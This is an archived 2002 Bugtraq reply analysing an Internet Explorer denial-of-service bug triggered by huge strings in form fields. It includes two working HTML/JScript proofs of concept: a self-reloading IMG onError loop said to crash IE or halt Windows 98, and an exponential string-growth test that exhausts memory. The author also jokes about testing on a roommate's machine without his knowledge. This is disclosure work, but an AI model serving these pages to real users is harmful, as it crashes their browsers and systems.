Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: IE FORM DOS

From: <SkyLined () mail com>
Date: 19 Jan 2002 19:56:33 -0000

In-Reply-To: <3C4381AE.13487.1AC142@localhost>

I ran your example of the problem with FORMs in IE 
6.0 under Win 2k on a 700Mhz AMD K7/256 Mb RAM 
(Btw. you either have to create a file '1.gif' or change 
the 'IMG onLoad' to 'IMG onError')
After loading the revised example IE starts 
consuming lots of memory. After 10-20 seconds a 
message pops up:
----------------------------------------------------------------
A script on this page is causing Internet Explorer to 
run slowly. If it continues to run, your computer may 
become unresponsive.

Do you want to abort the script?
----------------------------------------------------------------
Answering 'yes' will offcourse stop the script and all 
wil return to normal.
Answering 'no' will keep IE busy for a long, long while. 
When your try to terminate IE, windows will report it 
to be unresponsive, but you can still terminate it 
safely.

I've examined your code: I think the problem is in 
the 'for'-loop used to produce the long string:

   v="a";
   for(i=0;i<100000000;i++) {
       v=v+v;
   };

If fully executed, this will produce a string that is 
2^100,000,000 bytes long (2^100,000,000 is a number 
with roughly 810,000 digits: something like the 
number of atoms on earth or the number of stars in 
the universe!) I would like to know what kind of 
system you're running if you can run this code ;)

While testing the problem I (only once) got a "Out of 
memory on line:xx" error message when the value 
property of the INPUT object was set but I can't 
reproduce this behaviour ;(. This error appears to be 
of the same type you get when you run a loop like this:
----------------------------------------------------------------
<HTML>
  <BODY>
    <IMG id="oImg" src="::" onError="oImg.src = 
oImg.src;">
  </BODY>
</HTML>
----------------------------------------------------------------
On a windows 98/98SE machine these errors will 
mostly crash IE with a 'Stack fault' in one of it's 
Dynamic Link Libraries but it can be made to halt the 
entire system by generating a stack fault in 
KERNEL32.DLL.
On windows 2000 these errors will mostly 
generate 'Stack overflow on line:xx' error-messages 
and IE will continue to function. (It is possible to 
terminate all running IE processes without an error 
message in this way.)
Other version of windows have not been tested.
(See my website for more details on these 'loop'-
errors, http://spoor12.edup.tudelft.nl/skylined)

I created my own testing jscript, it is somewhat more 
complicated but does a more thorough test of IE:
----------------------------------------------------------------
<HTML>
  <BODY><FORM id="oForm">
    <INPUT type="text" id="oInput" value="a">
  </FORM></BODY>

  <SCRIPT>
    bErrorOccured = false;
    window.onerror = errorHandler;
    function errorHandler() {
      bErrorOccured = true;
      return true;
    }
    function testCode(sCode) {
      bErrorOccured = false;
      eval(sCode);
      return !bErrorOccured;
    }
    document.write('Testing, please wait ...<BR>');

    sString = 'a';
    iExpectedLength = sString.length;
    while(!bErrorOccured && sString.length == 
iExpectedLength) {
      iExpectedLength = sString.length * 2;
      window.status = iExpectedLength + ' bytes: 
string...';
      if (!testCode('sString += sString;')) {
        window.status += 'jscript error!';
      } else if (sString.length != iExpectedLength) {
        window.status += 'returned only ' + 
sString.length + ' bytes!';
      } else {
        window.status += 'ok, value...'
        if (!testCode('oForm.oInput.value = sString;')) {
          window.status += 'jscript error!';
        } else if (oForm.oInput.value.length != 
iExpectedLength) {
          window.status += 'returned only ' + 
oForm.oInput.value.length + ' bytes!';
        } else {
          window.status += 'ok';
        }
      }
      //alert(window.status);
      document.write(window.status + '<BR>');
    }
  </SCRIPT>
</HTML>
----------------------------------------------------------------
This makes (exponentially) increasyingly large strings 
and tries to set the value property to that string. I can 
make strings of up to 64Mb depending on my 
system's free RAM. With this test program IE will 
return a 0 byte or 64Mb strings without an error 
message on my machine when it tries to make a 
128Mb string.

I will do some more tests on my room mate's 
windows 98 machine when he's not arround to stop 
me, probably tomorrrow or the day after that.
Previous By Date Next
Previous By Thread Next

Current thread: